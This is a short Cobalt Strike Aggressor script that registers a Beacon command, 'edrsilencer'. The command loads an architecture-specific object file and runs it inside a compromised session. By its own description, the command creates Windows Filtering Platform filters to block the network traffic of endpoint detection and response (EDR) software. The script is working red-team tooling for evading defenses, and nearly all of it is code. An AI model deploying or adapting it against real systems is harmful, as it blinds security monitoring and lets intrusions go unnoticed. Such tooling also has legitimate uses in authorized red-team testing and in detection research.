#############################################################################
# Copyright 2024 Aon plc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
# Aggressor alias "edrsilencer": loads an architecture-specific BOF
# (edrsilencer.<arch>.o next to this script) and runs it in the session
# with two string arguments.  $1 is the session handle that every b*()
# call below receives; $2 is the sub-command and $3 an optional path/id.
alias edrsilencer {
local('$barch $handle $data $args $cmd $progpath');
# @_ holds the alias arguments; fewer than two means no sub-command.
if(size(@_) < 2)
{
berror($1, "usage: edrsilencer <blockedr/block/unblockall/unblock> [<program path>|<filter id>]");
return;
}
$cmd = $2;
# Third argument is optional; an empty string is packed when absent.
$progpath = iff(-istrue $3, $3, "");
# figure out the arch of this session
$barch = barch($1);
# read in the right BOF file
# NOTE(review): openf() is not checked for failure, so a missing
# edrsilencer.<arch>.o produces an empty/undefined $data rather than a
# clear error -- presumably the caller then sees a confusing failure.
$handle = openf(script_resource("edrsilencer. $+ $barch $+ .o"));
$data = readb($handle, -1);
closef($handle);
# pack our arguments
# "zz" packs two null-terminated strings: the sub-command and the path/id.
$args = bof_pack($1, "zz", $cmd, $progpath);
# Entry point "go" is the conventional BOF entry symbol.
beacon_inline_execute($1, $data, "go", $args);
}
# Register the alias with the console so it appears in help with the
# short description and synopsis below.
beacon_command_register(
"edrsilencer",
"Create WFP filter to block EDR network traffic",
"Synopsis: edrsilencer <blockedr/block/unblockall/unblock> [<program path>|filter id]\n");